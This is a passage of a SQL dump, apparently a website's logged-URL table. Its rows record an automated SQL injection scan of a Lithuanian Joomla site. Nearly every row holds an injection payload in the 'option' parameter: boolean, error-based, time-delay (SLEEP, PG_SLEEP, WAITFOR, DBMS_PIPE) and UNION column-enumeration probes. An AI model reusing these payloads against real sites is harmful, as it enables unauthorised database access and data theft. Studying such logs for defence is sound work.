(\'Qgcg\'=\'Qgcg&view=article&id=305','','','',1,0,'2023-07-21 16:05:20','0000-00-00 00:00:00'),(5554,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' AND 7855=5763 AND \'BNBV\'=\'BNBV&view=article&id=305','','','',1,0,'2023-07-21 16:05:21','0000-00-00 00:00:00'),(5555,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' AND 7731=7731 AND \'gcyS\'=\'gcyS&view=article&id=305','','','',1,0,'2023-07-21 16:05:22','0000-00-00 00:00:00'),(5556,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' AND 5829=9282 AND \'%\'=\'&view=article&id=305','','','',1,0,'2023-07-21 16:05:23','0000-00-00 00:00:00'),(5557,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' AND 7731=7731 AND \'%\'=\'&view=article&id=305','','','',1,0,'2023-07-21 16:05:24','0000-00-00 00:00:00'),(5558,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content AND 1100=4776-- ezrg&view=article&id=305','','','',1,0,'2023-07-21 16:05:24','0000-00-00 00:00:00'),(5559,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content AND 7731=7731-- cUEB&view=article&id=305','','','',1,0,'2023-07-21 16:05:25','0000-00-00 00:00:00'),(5560,'https://www.infotytuvenai.lt/index.php/lt/?option=(SELECT (CASE WHEN (7519=8726) THEN 7519 ELSE 7519*(SELECT 7519 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&view=article&id=305','','','',1,0,'2023-07-21 16:05:26','0000-00-00 00:00:00'),(5561,'https://www.infotytuvenai.lt/index.php/lt/?option=(SELECT (CASE WHEN (3760=3760) THEN 3760 ELSE 3760*(SELECT 3760 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&view=article&id=305','','','',1,0,'2023-07-21 16:05:27','0000-00-00 00:00:00'),(5562,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) AND (SELECT 2263 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT (ELT(2263=2263,1))),0x7162767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (5709=5709&view=a','','','',1,0,'2023-07-21 16:05:28','0000-00-00 00:00:00'),(5563,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content AND (SELECT 2263 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT (ELT(2263=2263,1))),0x7162767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&view=article&id=305','','','',1,0,'2023-07-21 16:05:29','0000-00-00 00:00:00'),(5564,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') AND (SELECT 2263 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT (ELT(2263=2263,1))),0x7162767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (\'QwIk\'=\'QwIk&vi','','','',1,0,'2023-07-21 16:05:30','0000-00-00 00:00:00'),(5565,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' AND (SELECT 2263 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT (ELT(2263=2263,1))),0x7162767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND \'cgcv\'=\'cgcv&view','','','',1,0,'2023-07-21 16:05:31','0000-00-00 00:00:00'),(5566,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' AND (SELECT 2263 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT (ELT(2263=2263,1))),0x7162767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND \'%\'=\'&view=artic','','','',1,0,'2023-07-21 16:05:31','0000-00-00 00:00:00'),(5567,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content AND (SELECT 2263 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT (ELT(2263=2263,1))),0x7162767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- hezb&view=article&id','','','',1,0,'2023-07-21 16:05:32','0000-00-00 00:00:00'),(5568,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) AND 3854=CAST((CHR(113)||CHR(122)||CHR(106)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3854=3854) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(118)||CHR(112)||CHR(113)) AS NUMERIC) AND (5','','','',1,0,'2023-07-21 16:05:33','0000-00-00 00:00:00'),(5569,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content AND 3854=CAST((CHR(113)||CHR(122)||CHR(106)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3854=3854) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(118)||CHR(112)||CHR(113)) AS NUMERIC)&view=ar','','','',1,0,'2023-07-21 16:05:34','0000-00-00 00:00:00'),(5570,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') AND 3854=CAST((CHR(113)||CHR(122)||CHR(106)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3854=3854) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(118)||CHR(112)||CHR(113)) AS NUMERIC) AND (','','','',1,0,'2023-07-21 16:05:35','0000-00-00 00:00:00'),(5571,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' AND 3854=CAST((CHR(113)||CHR(122)||CHR(106)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3854=3854) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(118)||CHR(112)||CHR(113)) AS NUMERIC) AND \'W','','','',1,0,'2023-07-21 16:05:35','0000-00-00 00:00:00'),(5572,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' AND 3854=CAST((CHR(113)||CHR(122)||CHR(106)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3854=3854) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(118)||CHR(112)||CHR(113)) AS NUMERIC) AND \'','','','',1,0,'2023-07-21 16:05:36','0000-00-00 00:00:00'),(5573,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content AND 3854=CAST((CHR(113)||CHR(122)||CHR(106)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3854=3854) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(118)||CHR(112)||CHR(113)) AS NUMERIC)-- FqOu&','','','',1,0,'2023-07-21 16:05:37','0000-00-00 00:00:00'),(5574,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) AND 2444=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(106)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2444=2444) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(112)+CHAR(113)','','','',1,0,'2023-07-21 16:05:38','0000-00-00 00:00:00'),(5575,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content AND 2444=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(106)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2444=2444) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(112)+CHAR(113))','','','',1,0,'2023-07-21 16:05:39','0000-00-00 00:00:00'),(5576,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') AND 2444=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(106)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2444=2444) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(112)+CHAR(113','','','',1,0,'2023-07-21 16:05:39','0000-00-00 00:00:00'),(5577,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' AND 2444=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(106)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2444=2444) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(112)+CHAR(113)','','','',1,0,'2023-07-21 16:05:40','0000-00-00 00:00:00'),(5578,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' AND 2444=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(106)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2444=2444) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(112)+CHAR(113','','','',1,0,'2023-07-21 16:05:41','0000-00-00 00:00:00'),(5580,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) AND 4916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(106)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (4916=4916) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(118)||CH','','','',1,0,'2023-07-21 16:05:43','0000-00-00 00:00:00'),(5581,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content AND 4916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(106)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (4916=4916) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(118)||CHR','','','',1,0,'2023-07-21 16:05:43','0000-00-00 00:00:00'),(5582,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') AND 4916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(106)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (4916=4916) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(118)||C','','','',1,0,'2023-07-21 16:05:44','0000-00-00 00:00:00'),(5583,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' AND 4916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(106)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (4916=4916) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(118)||CH','','','',1,0,'2023-07-21 16:05:45','0000-00-00 00:00:00'),(5584,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' AND 4916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(106)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (4916=4916) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(118)||C','','','',1,0,'2023-07-21 16:05:46','0000-00-00 00:00:00'),(5586,'https://www.infotytuvenai.lt/index.php/lt/?option=(SELECT 6903 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT (ELT(6903=6903,1))),0x7162767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&view=article&id=305','','','',1,0,'2023-07-21 16:05:47','0000-00-00 00:00:00'),(5587,'https://www.infotytuvenai.lt/index.php/lt/?option=(SELECT CONCAT(0x717a6a6a71,(SELECT (ELT(7039=7039,1))),0x7162767071))&view=article&id=305','','','',1,0,'2023-07-21 16:05:49','0000-00-00 00:00:00'),(5588,'https://www.infotytuvenai.lt/index.php/lt/?option=(SELECT (CHR(113)||CHR(122)||CHR(106)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (4387=4387) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(118)||CHR(112)||CHR(113)))&view=article&id=305','','','',1,0,'2023-07-21 16:05:49','0000-00-00 00:00:00'),(5589,'https://www.infotytuvenai.lt/index.php/lt/?option=(SELECT CHAR(113)+CHAR(122)+CHAR(106)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3200=3200) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(112)+CHAR(113))&view=article&id=305','','','',1,0,'2023-07-21 16:05:50','0000-00-00 00:00:00'),(5590,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content);SELECT SLEEP(5)#&view=article&id=305','','','',1,0,'2023-07-21 16:05:51','0000-00-00 00:00:00'),(5591,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content;SELECT SLEEP(5)#&view=article&id=305','','','',1,0,'2023-07-21 16:05:52','0000-00-00 00:00:00'),(5592,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\');SELECT SLEEP(5)#&view=article&id=305','','','',1,0,'2023-07-21 16:05:52','0000-00-00 00:00:00'),(5593,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\';SELECT SLEEP(5)#&view=article&id=305','','','',1,0,'2023-07-21 16:05:53','0000-00-00 00:00:00'),(5594,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\';SELECT SLEEP(5)#&view=article&id=305','','','',1,0,'2023-07-21 16:05:54','0000-00-00 00:00:00'),(5595,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content);SELECT PG_SLEEP(5)--&view=article&id=305','','','',1,0,'2023-07-21 16:05:55','0000-00-00 00:00:00'),(5596,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content;SELECT PG_SLEEP(5)--&view=article&id=305','','','',1,0,'2023-07-21 16:05:55','0000-00-00 00:00:00'),(5597,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\');SELECT PG_SLEEP(5)--&view=article&id=305','','','',1,0,'2023-07-21 16:05:56','0000-00-00 00:00:00'),(5598,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\';SELECT PG_SLEEP(5)--&view=article&id=305','','','',1,0,'2023-07-21 16:05:56','0000-00-00 00:00:00'),(5599,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\';SELECT PG_SLEEP(5)--&view=article&id=305','','','',1,0,'2023-07-21 16:05:57','0000-00-00 00:00:00'),(5600,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content);WAITFOR DELAY \'0:0:5\'--&view=article&id=305','','','',1,0,'2023-07-21 16:05:58','0000-00-00 00:00:00'),(5601,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content;WAITFOR DELAY \'0:0:5\'--&view=article&id=305','','','',1,0,'2023-07-21 16:05:59','0000-00-00 00:00:00'),(5602,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\');WAITFOR DELAY \'0:0:5\'--&view=article&id=305','','','',1,0,'2023-07-21 16:05:59','0000-00-00 00:00:00'),(5603,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\';WAITFOR DELAY \'0:0:5\'--&view=article&id=305','','','',1,0,'2023-07-21 16:06:00','0000-00-00 00:00:00'),(5604,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\';WAITFOR DELAY \'0:0:5\'--&view=article&id=305','','','',1,0,'2023-07-21 16:06:01','0000-00-00 00:00:00'),(5605,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(115)||CHR(121)||CHR(106),5) FROM DUAL--&view=article&id=305','','','',1,0,'2023-07-21 16:06:01','0000-00-00 00:00:00'),(5606,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(115)||CHR(121)||CHR(106),5) FROM DUAL--&view=article&id=305','','','',1,0,'2023-07-21 16:06:02','0000-00-00 00:00:00'),(5607,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(115)||CHR(121)||CHR(106),5) FROM DUAL--&view=article&id=305','','','',1,0,'2023-07-21 16:06:03','0000-00-00 00:00:00'),(5608,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(115)||CHR(121)||CHR(106),5) FROM DUAL--&view=article&id=305','','','',1,0,'2023-07-21 16:06:03','0000-00-00 00:00:00'),(5609,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(115)||CHR(121)||CHR(106),5) FROM DUAL--&view=article&id=305','','','',1,0,'2023-07-21 16:06:04','0000-00-00 00:00:00'),(5610,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) AND SLEEP(5) AND (4834=4834&view=article&id=305','','','',1,0,'2023-07-21 16:06:05','0000-00-00 00:00:00'),(5611,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content AND SLEEP(5)&view=article&id=305','','','',1,0,'2023-07-21 16:06:05','0000-00-00 00:00:00'),(5612,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') AND SLEEP(5) AND (\'CYjz\'=\'CYjz&view=article&id=305','','','',1,0,'2023-07-21 16:06:06','0000-00-00 00:00:00'),(5613,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' AND SLEEP(5) AND \'qBrW\'=\'qBrW&view=article&id=305','','','',1,0,'2023-07-21 16:06:07','0000-00-00 00:00:00'),(5614,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' AND SLEEP(5) AND \'%\'=\'&view=article&id=305','','','',1,0,'2023-07-21 16:06:07','0000-00-00 00:00:00'),(5615,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content AND SLEEP(5)-- YFTc&view=article&id=305','','','',1,0,'2023-07-21 16:06:08','0000-00-00 00:00:00'),(5616,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) AND 3223=(SELECT 3223 FROM PG_SLEEP(5)) AND (8806=8806&view=article&id=305','','','',1,0,'2023-07-21 16:06:09','0000-00-00 00:00:00'),(5617,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content AND 3223=(SELECT 3223 FROM PG_SLEEP(5))&view=article&id=305','','','',1,0,'2023-07-21 16:06:09','0000-00-00 00:00:00'),(5618,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') AND 3223=(SELECT 3223 FROM PG_SLEEP(5)) AND (\'TvaZ\'=\'TvaZ&view=article&id=305','','','',1,0,'2023-07-21 16:06:10','0000-00-00 00:00:00'),(5619,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' AND 3223=(SELECT 3223 FROM PG_SLEEP(5)) AND \'XnZx\'=\'XnZx&view=article&id=305','','','',1,0,'2023-07-21 16:06:11','0000-00-00 00:00:00'),(5620,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' AND 3223=(SELECT 3223 FROM PG_SLEEP(5)) AND \'%\'=\'&view=article&id=305','','','',1,0,'2023-07-21 16:06:12','0000-00-00 00:00:00'),(5621,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content AND 3223=(SELECT 3223 FROM PG_SLEEP(5))-- TfvJ&view=article&id=305','','','',1,0,'2023-07-21 16:06:12','0000-00-00 00:00:00'),(5622,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) WAITFOR DELAY \'0:0:5\' AND (6245=6245&view=article&id=305','','','',1,0,'2023-07-21 16:06:13','0000-00-00 00:00:00'),(5623,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content WAITFOR DELAY \'0:0:5\'&view=article&id=305','','','',1,0,'2023-07-21 16:06:14','0000-00-00 00:00:00'),(5624,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') WAITFOR DELAY \'0:0:5\' AND (\'yxFw\'=\'yxFw&view=article&id=305','','','',1,0,'2023-07-21 16:06:15','0000-00-00 00:00:00'),(5625,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' WAITFOR DELAY \'0:0:5\' AND \'tTwv\'=\'tTwv&view=article&id=305','','','',1,0,'2023-07-21 16:06:15','0000-00-00 00:00:00'),(5626,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' WAITFOR DELAY \'0:0:5\' AND \'%\'=\'&view=article&id=305','','','',1,0,'2023-07-21 16:06:16','0000-00-00 00:00:00'),(5627,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content WAITFOR DELAY \'0:0:5\'-- gqVT&view=article&id=305','','','',1,0,'2023-07-21 16:06:17','0000-00-00 00:00:00'),(5628,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) AND 9037=DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(105)||CHR(77)||CHR(111),5) AND (8840=8840&view=article&id=305','','','',1,0,'2023-07-21 16:06:17','0000-00-00 00:00:00'),(5629,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content AND 9037=DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(105)||CHR(77)||CHR(111),5)&view=article&id=305','','','',1,0,'2023-07-21 16:06:18','0000-00-00 00:00:00'),(5630,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') AND 9037=DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(105)||CHR(77)||CHR(111),5) AND (\'opdd\'=\'opdd&view=article&id=305','','','',1,0,'2023-07-21 16:06:19','0000-00-00 00:00:00'),(5631,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' AND 9037=DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(105)||CHR(77)||CHR(111),5) AND \'HWUa\'=\'HWUa&view=article&id=305','','','',1,0,'2023-07-21 16:06:20','0000-00-00 00:00:00'),(5632,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' AND 9037=DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(105)||CHR(77)||CHR(111),5) AND \'%\'=\'&view=article&id=305','','','',1,0,'2023-07-21 16:06:20','0000-00-00 00:00:00'),(5633,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content AND 9037=DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(105)||CHR(77)||CHR(111),5)-- ReLQ&view=article&id=305','','','',1,0,'2023-07-21 16:06:21','0000-00-00 00:00:00'),(5634,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) ORDER BY 1-- mqPy&view=article&id=305','','','',1,0,'2023-07-21 16:06:22','0000-00-00 00:00:00'),(5635,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL-- OCSU&view=article&id=305','','','',1,0,'2023-07-21 16:06:24','0000-00-00 00:00:00'),(5636,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL-- laKz&view=article&id=305','','','',1,0,'2023-07-21 16:06:26','0000-00-00 00:00:00'),(5637,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL-- ISil&view=article&id=305','','','',1,0,'2023-07-21 16:06:28','0000-00-00 00:00:00'),(5638,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL-- eGjr&view=article&id=305','','','',1,0,'2023-07-21 16:06:30','0000-00-00 00:00:00'),(5639,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- IbgT&view=article&id=305','','','',1,0,'2023-07-21 16:06:32','0000-00-00 00:00:00'),(5640,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- pqjO&view=article&id=305','','','',1,0,'2023-07-21 16:06:34','0000-00-00 00:00:00'),(5641,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- fAxh&view=article&id=305','','','',1,0,'2023-07-21 16:06:35','0000-00-00 00:00:00'),(5642,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- gnNN&view=article&id=305','','','',1,0,'2023-07-21 16:06:37','0000-00-00 00:00:00'),(5643,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- SZPP&view=article&id=305','','','',1,0,'2023-07-21 16:06:39','0000-00-00 00:00:00'),(5644,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- fttO&view=article&id=305','','','',1,0,'2023-07-21 16:06:41','0000-00-00 00:00:00'),(5645,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content ORDER BY 1-- yDNp&view=article&id=305','','','',1,0,'2023-07-21 16:06:43','0000-00-00 00:00:00'),(5646,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL-- RPCl&view=article&id=305','','','',1,0,'2023-07-21 16:06:45','0000-00-00 00:00:00'),(5647,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL-- jNUl&view=article&id=305','','','',1,0,'2023-07-21 16:06:46','0000-00-00 00:00:00'),(5648,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL-- gmqx&view=article&id=305','','','',1,0,'2023-07-21 16:06:48','0000-00-00 00:00:00'),(5649,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL-- fSQy&view=article&id=305','','','',1,0,'2023-07-21 16:06:50','0000-00-00 00:00:00'),(5650,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- guJg&view=article&id=305','','','',1,0,'2023-07-21 16:06:52','0000-00-00 00:00:00'),(5651,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- Pppy&view=article&id=305','','','',1,0,'2023-07-21 16:06:54','0000-00-00 00:00:00'),(5652,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- gEaJ&view=article&id=305','','','',1,0,'2023-07-21 16:06:55','0000-00-00 00:00:00'),(5653,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- cKob&view=article&id=305','','','',1,0,'2023-07-21 16:06:57','0000-00-00 00:00:00'),(5654,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KYsI&view=article&id=305','','','',1,0,'2023-07-21 16:06:59','0000-00-00 00:00:00'),(5655,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- jcfS&view=article&id=305','','','',1,0,'2023-07-21 16:07:01','0000-00-00 00:00:00'),(5656,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') ORDER BY 1-- ccLV&view=article&id=305','','','',1,0,'2023-07-21 16:07:03','0000-00-00 00:00:00'),(5657,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL-- hgFi&view=article&id=305','','','',1,0,'2023-07-21 16:07:04','0000-00-00 00:00:00'),(5658,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL-- uCdw&view=article&id=305','','','',1,0,'2023-07-21 16:07:06','0000-00-00 00:00:00'),(5659,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL-- MEQL&view=article&id=305','','','',1,0,'2023-07-21 16:07:08','0000-00-00 00:00:00'),(5660,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL-- MtNv&view=article&id=305','','','',1,0,'2023-07-21 16:07:10','0000-00-00 00:00:00'),(5661,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- mOBf&view=article&id=305','','','',1,0,'2023-07-21 16:07:11','0000-00-00 00:00:00'),(5662,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- mEBU&view=article&id=305','','','',1,0,'2023-07-21 16:07:13','0000-00-00 00:00:00'),(5663,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- QrsP&view=article&id=305','','','',1,0,'2023-07-21 16:07:15','0000-00-00 00:00:00'),(5664,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- AcVg&view=article&id=305','','','',1,0,'2023-07-21 16:07:17','0000-00-00 00:00:00'),(5665,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- xnvH&view=article&id=305','','','',1,0,'2023-07-21 16:07:19','0000-00-00 00:00:00'),(5666,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rCLC&view=article&id=305','','','',1,0,'2023-07-21 16:07:21','0000-00-00 00:00:00'),(5667,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' ORDER BY 1-- lQDo&view=article&id=305','','','',1,0,'2023-07-21 16:07:22','0000-00-00 